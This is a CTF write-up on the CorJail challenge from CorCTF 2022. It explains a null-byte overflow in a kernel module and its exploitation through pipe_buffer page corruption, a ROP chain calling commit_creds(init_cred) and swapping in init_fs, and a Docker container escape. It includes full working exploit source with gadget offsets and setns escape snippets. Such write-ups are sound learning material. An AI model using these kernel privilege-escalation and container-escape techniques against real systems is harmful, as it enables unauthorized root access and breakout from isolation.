OFF-BY-NULL to Docker Escaping: CorJail (CorCTF 2022)

📑 Prologue

This is a write-up documenting a trial for the CTF challenge CorJail from CorCTF 2022. The challenge resource is avaliable on corCTF Github repo. The author’s write up is also good study resources. I exploited it by myself so using an different method. I’ll introduced the tiny problems I encountered and talk about the technical skills required for this challenge.

🏔️ Build the Enviroment

In the official github repo, not like other challenges, we only have bzImage but not filesystem . To reproduce the challenge, we have to rebuild the filesystem . The infrastructure is in the pwn/corjail/task/build/ dir. I found it’s hard to finish the enviroment building on my ubuntu22.04 but easy on ubuntu20.04. I used build_image.sh script to build the filesystem .

Considering the complex setup of this challenge. I also did some modifications to make the local debugging simpler. In this challenge, we are asked to first exploit a bug in a kernel module to get root privilege and than escape the docker container. If we have the correct enviroment, we gonna have a shell in a docker container, which is running in a QEMU VM. To ease debugging, we need to support the following two features:

  1. Get a root shell on the QEMU VM so we can get the kernel information (kallsyms, module) easier
  2. Upload EXP (our exploiting binary): I include a static netcat binary and modified the init/ jail scripts(/usr/local/bin) on the QEMU VM to support this feature. But I noticed there is network and curl after I solved the challenge read the official write up. In my method I kept running a script at backgroun after adding some forwarding settings for QEMU(-net user,hostfwd=tcp::49999-:49998 ):
#!/bin/bash
while true
do
nc -lp 49998  > /exp
chmod +x /exp
docker cp /exp `docker ps -aq`:/
done

After build the filesystem including debugging tools, we can run it with the ./run_challenge.sh script and get a user privileged shell in the docker container with a very cool CoROS logo. If we throw a binary to the 49999 port on the host (cat ./exp | nc -v 0.0.0.0 49999) we gonna see an EXP binary in the docker container.

Challenge

🎮 Challenge

The challenge implemened a kernel module enabling syscall usage monitoring. If we reverse the kernel module (cormon.ko), it’s not hard to locate the bug in cormon_proc_write:

	kheap_obj = (char *)kmem_cache_alloc_trace(kmalloc_caches[12], 2592LL, 4096LL);
  printk(&unk_578, kheap_obj);
  if ( kheap_obj )
  {
    _check_object_size(kheap_obj, length_user, 0LL);
    if ( copy_from_user(kheap_obj, a2, length_user) )
    {
      printk(&unk_5D0, a2);
      return -14LL;
    }
    else
    {
      kheap_obj[length_user] = 0; // Overflow with a null byte
      if ( (unsigned int)update_filter(kheap_obj) )
      {
        kfree(kheap_obj);
        return -22LL;
      }
...

The bug is an overflow bug but there is one null byte overflow on a 0x1000 object. There are two important facts about this vulnerability:

  1. The obejct size is fixed to be 0x1000 bytes
  2. Overflow a null byte

This bug is not hard to exploit for me since I exploited a similar bug with a simmilar method.

🗡️ Solution

We have to use the additional null byte corrput some metadata to gain more control and there is a perfect candidate for that: pipe_buffer . There is an page address at the offset 0 for pipe_buffer, which means we can overwrite it to point to another page:

struct pipe_buffer {
	struct page *              page;                 /*     0     8 */
	unsigned int               offset;               /*     8     4 */
	unsigned int               len;                  /*    12     4 */
	const struct pipe_buf_operations  * ops;         /*    16     8 */
	unsigned int               flags;                /*    24     4 */

	/* XXX 4 bytes hole, try to pack */

	long unsigned int          private;              /*    32     8 */

	/* size: 40, cachelines: 1, members: 6 */
	/* sum members: 36, holes: 1, sum holes: 4 */
	/* last cacheline: 40 bytes */
};

Here is my gdb functions to transfer a page struct address to a virtual address:

set $VM=0xffff888000000000
set $BASE=0xffffffff81000000
set $PAGE=0xffffea0000000000
define p2v
    p/x ($arg0-$PAGE)*0x40+$VM
end
define v2p
    p/x ($arg0-$VM)/0x40+$PAGE
end

Assuming we have a pipe struct next to the vulnerable object that ends with 0x40 (e.g., 0xffffea0000000040).If we overflow and change it to 0xffffea0000000000 , it points to a page before the page it should point to and enable our AAW/AAR on that page.

So our plan is:

  1. Spray lots of pipe_buffer list obejcts (size=0x1000)
  2. Create a hole in them
  3. Trigger the bug to overwrite the page struct address in pipe_buffer
  4. Arbitrary Read to leak
  5. Arbitrary Write to gain control flow hijacking

I chose the file objects as my targets since I can get the heap address simply from it and it has the f_op as the control flow hijacking target. There is a tip when we are attacking objects using pipe_buffer AAR/AAW that we should not modify the unesscessary data (especially in a docker container enviroment). I spent so much time since I currupted the data and trigger a null pointer dereference killing the kernel (eventpoll_release_file). Using some kernel heap fengshui skills gaining control flow hijacking is not hard. However, I have no experience to escape from a dcoekr container.

🚀 Docker Escape

Getting the information from my labmates daily chat, I only heard that is not hard as long as people have control flow hijacking. So I search for some kernelCTF script and find there are some articles and exploitation scripts to do that. I first tried the method mentioned on CVE-2021-22555.

  • Kernel ROP to switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)
  • setns in usermode to escape
  setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
  setns(open("/proc/1/ns/pid", O_RDONLY), 0);
  setns(open("/proc/1/ns/net", O_RDONLY), 0);

  char *args[] = {"/bin/bash", "-i", NULL};
  execve(args[0], args, NULL);

This method changes the namespaces for the task belonging to pid=1 to init_nsproxy . It sounds but it didn’t work well for me. I read more recent exploits from kernelCTF repo for CVE-2023-5345_lts_mitigation. This exploit uses a similar method performing the similar options: getting the task for current pid’s task and replace it with init_nsproxy . But it performs the switch option manually instead of using switch_task_namespaces . It worked for me!

The rop chain I used is quite similar to the one from kernelCTF

    // commit_creds(init_cred)
    ptr[index++] = rdi+1;
    ptr[index++] = rdi;
    ptr[index++] = init_cred;
    ptr[index++] = commit_creds;
    // mov [find_task_by_vpid(getpid())+1760], init_fs
    ptr[index++] = rdi;
    ptr[index++] = getpid();
    ptr[index++] = find_task_by_vpid;
    ptr[index++] = rcx;
    ptr[index++] = 1760; 
    ptr[index++] = add_rax_rcx_ret ; 
    ptr[index++] = rsi ; 
    ptr[index++] = init_fs ; 
    ptr[index++] = mov_qword_ptr_rax_rsi_ret;
    // land userspace
    ptr[index++] = swap_gs_iret;
    ptr[index++] = 0;
    ptr[index++] = 0;
    ptr[index++] = shellx;
    ptr[index++] = user_cs;
    ptr[index++] = user_rflags;
    ptr[index++] = user_sp|8;
    ptr[index++] = user_ss;

⚔️ EXP

#include "libx.h"
// https://github.com/n132/libx.git
#define NR_PIPE 0x7
int fd = 0 ; 
size_t pivot, RBP_VAL;
void tainRegs(u64 base,u64 heap){
    
    pivot   = 0xffffffff819a71fc - NO_ASLR_BASE + base; 
    RBP_VAL = heap;
    __asm__("mov rax, 0x9999999999999990;"
    "mov rbx, 0x9999999999999991;"
    "mov rcx, 0x9999999999999992;"
    "mov rdx, 0x9999999999999993;"
    "mov rdi, 0x9999999999999994;"
    "mov rsi, 0x9999999999999995;"
    "mov r8,  0x9999999999999996;"
    "mov r9,  0x9999999999999997;"
    "mov r10, 0x9999999999999998;"
    "mov r11, 0x9999999999999999;"
    "mov r12, 0x999999999999999a;"
    "mov r13, pivot;"
    "mov r14, 0x99999999999999fc;"
    "mov r15, RBP_VAL;"
    "leave;"
    "ret;");
}
void shellx(){
    char *sh_args[] = {"sh", NULL};
    execve("/bin/sh", sh_args, NULL);
    while(1);
}
void _sigsegv_handler2(int sig, siginfo_t *si, void *unused) {
    
    info("Libx: SegFault Handler is spwaning a shell...");
    shellx();
    while(1); // Techniquly, we never his this line
}
void hook_segfault2(){
    struct sigaction sa;
    memset(&sa, 0, sizeof(sigaction));
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = SA_SIGINFO;
    sa.sa_sigaction = _sigsegv_handler2;

    if (sigaction(SIGSEGV, &sa, NULL) == -1) {
        perror("hook_segfault");
        exit(EXIT_FAILURE);
    }
    // info("SegFault Hooked");
}
void libxInitX(){
    pinCPU(0);
    impLimit();
    hook_segfault2();
    initPipeBuffer(pipe_fd);
    initSocketArray(sk_fd);
    success("Libx Inited");
}
int  attempt(){

    char *T = malloc(0x10000);
    memset(T,0,0x10000);
    memset(T,'i',0x1000);
    memcpy(T,p64(0xdeadbeef),8);
    fd = open("/proc_rw/cormon",2);

    libxInitX();
    int fds[0x400] = {};
    for(int i = 0 ; i < 0x180 ;i++)
        fds[i] = open("/etc/passwd",0);
    

    int fengshui[2];
    pipe(fengshui);
    int shuifeng[2];
    pipe(shuifeng);
    pipeBufferResize(fengshui[0],0x40); 
    pipeBufferResize(shuifeng[0],0x40); 
    // 0x40*0x28 = 0xa00 
    
    int victim[NR_PIPE][2];
    for(int i = 0 ; i < NR_PIPE;i++)
        pipe(victim[i]);
    for(int i = 0 ; i < 0x1c; i++)
        for(int j = 0 ; j < 0x6;j++)
            write(sk_fd[i][1],T,0x1000-0x140);
    for(int i = 0x1c ; i < 0x20; i++)
        write(sk_fd[i][1],T,0x1000-0x140);
    // Poke 4 holes
    for(int i = 0x1c ; i < 0x20; i++)
        read(sk_fd[i][0],T+0x8000,0x1000-0x140);
    // Fill the holes
    for(int i = 0 ; i < NR_PIPE; i++)
        pipeBufferResize(victim[i][0],0x40);
    
    // Fengshui
    for(int i = 0 ; i < 0x40; i++)
        write(fengshui[1],T,0x1000); // Lift the end

    
    int ct =  0x180;
    for(int z =0 ;z <NR_PIPE; z++)
    {
        
        memcpy(T,p64(0xcafebabe000+z),8);
        write(victim[z][1],T,0xc28);
        for(int i = 0x20 ; i < 0x40 ;i++)
            fds[ct++] = open("/etc/passwd",0);
    }
    
    // debug();
    read(sk_fd[0x1c-1][0],T+0x8000,0x1000-0x140);
    write(fd,T+0x6000,0x1000);
    // debug();
    size_t TARGET_ADDR = 0;
    size_t KASLR = 0;
    size_t idx  = -1;
    char buf[0x100]={};
    for(int i = 0 ; i < NR_PIPE ;i++)
    {
        memset(buf,0,0x100);
        read(victim[i][0],buf,0x100);
        size_t permission = *(size_t *)(buf+0x40);

        if(0x6c0a801d04048000 == permission)
        {
            TARGET_ADDR = *(size_t *)(buf+0x58) -0x58;
            KASLR = *(size_t *)(buf+0x28) - 0x1040400;
            if(KASLR&0xfffff){
                KASLR = (KASLR+0x800000)>>24<<24;
            }
            idx = i;
            goto ALIVE;
        }
    }
    warn("đź’” Unfortunately...");
    exit(0);

    ALIVE:
    success(hex(KASLR));
    success(hex(TARGET_ADDR));
    size_t * ptr = 0;
    ptr     = (size_t *)(buf+0x28);
    *ptr    = (size_t *)((TARGET_ADDR>>12<<12)+0x20000 -0x78);

    ptr = T;
    int index = 0 ;
    memset(ptr,0,0x1000);

    size_t rdi = 0xffffffff819e52dd - NO_ASLR_BASE + KASLR;
    size_t rcx = 0xffffffff8192f977 - NO_ASLR_BASE + KASLR;
    size_t rdx = 0xffffffff81a0518a - NO_ASLR_BASE + KASLR;
    size_t rsi = 0xffffffff81a0edd8 - NO_ASLR_BASE + KASLR;
    size_t gadget                   = 0xffffffff8111138a - NO_ASLR_BASE + KASLR;
    size_t init_cred                = 0xffffffff8245a960 - NO_ASLR_BASE + KASLR;
    size_t commit_creds             = 0xffffffff810eba40 - NO_ASLR_BASE + KASLR;
    size_t swap_gs_iret             = 0xffffffff81c00f06 - NO_ASLR_BASE + KASLR;
    size_t init_nsproxy             = 0xffffffff8245a720 - NO_ASLR_BASE + KASLR;
    size_t add_rax_rcx_ret          = 0xffffffff810587d3 - NO_ASLR_BASE + KASLR;
    size_t find_task_by_vpid        = 0xffffffff810e4fc0 - NO_ASLR_BASE + KASLR;
    size_t switch_task_namespaces   = 0xffffffff810ea4e0 - NO_ASLR_BASE + KASLR;
    size_t mov_qword_ptr_rax_rsi_ret= 0xffffffff815b55c1 - NO_ASLR_BASE + KASLR;
    size_t init_fs                  = 0xffffffff82589740 - NO_ASLR_BASE + KASLR;

    ptr[index++] = gadget;
    saveStatus();
    index = 0x21;
    ptr[index++] = rdi+1;
    ptr[index++] = rdi;
    ptr[index++] = init_cred;
    ptr[index++] = commit_creds;
    ptr[index++] = rdi;
    ptr[index++] = getpid();
    ptr[index++] = find_task_by_vpid;
    ptr[index++] = rcx;
    ptr[index++] = 1760; 
    ptr[index++] = add_rax_rcx_ret ; 
    ptr[index++] = rsi ; 
    ptr[index++] = init_fs ; 
    ptr[index++] = mov_qword_ptr_rax_rsi_ret;
    ptr[index++] = swap_gs_iret;
    ptr[index++] = 0;
    ptr[index++] = 0;
    ptr[index++] = shellx;
    ptr[index++] = user_cs;
    ptr[index++] = user_rflags;
    ptr[index++] = user_sp|8;
    ptr[index++] = user_ss;
    for(int i = 0 ; i < 0x40; i++)
        write(shuifeng[1],T,0x1000); 

    debug();
    size_t res = write(victim[idx][1],buf+0x28,8);
    success("🚀 Escaping...");
    tainRegs(KASLR,(size_t *)((TARGET_ADDR>>12<<12)+0x20000+0x100));
    for(int i = 0 ; i < ct ; i++)
        close(fds[i]);
    exit(0);
}
int  main(){
    while(1) {
		if(!fork()) 
            attempt();
		else 
			wait(NULL);
	}
}

Exploited

🧙🏽‍♂️ Epilogue

This challenge is a complete one including bug discovery, exploitation, and docker escaping. I practiced some pipe_buffer / fengshui skills on this challenge and performed my first docker escaping!

Also, thsi challenges mean very much to me since it’s the last CTF challenge Kyle sent me for practicing. I made it independetly within two days. Now I can confidently say that I know some kernel exploiation and I am ready to start CVE reproducing!